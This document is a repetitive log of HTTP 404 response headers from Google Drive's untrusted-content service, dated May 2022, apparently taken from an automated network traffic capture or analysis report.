                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yWs9ze+joafCErv67CoSNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-0AoYllqDMbxBzIRgx+iGWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6Slt05UvUowfmF6oLZtZkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JtRkWUP2xqgbNJhq0OPhVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-UKLYf3MQ8+j4yGSRhc/mhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-TMYTNZOonB0Nb037YfanKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-tEvDbdp0NNxkDY/SwvRk+g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-cI6JBJOd5Nf06gxc2cA6Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-BTMT2q24BEDz1UVnshYJ4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-7p5YRMsEywCHntHR5xqzEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-gvq+zAin3eq4Zvkh7Igs3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qJjUKXLdo6aIRqQqRH8X+w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:52 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EGe6pA1Wqe5N9kAo+U9ZVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-gZM8tRZRKrnFNKfPTLNlVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-KnLOB/QgUqiTrprlAjUWRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-V16PeF6TGjVdxPnGmonT1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-QCNbdgp6Ln4EeVykUH/YqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GrZHkuQ51njMZ/qTCPNofQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-B3kFKwfFhoSH9PTruRc3Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
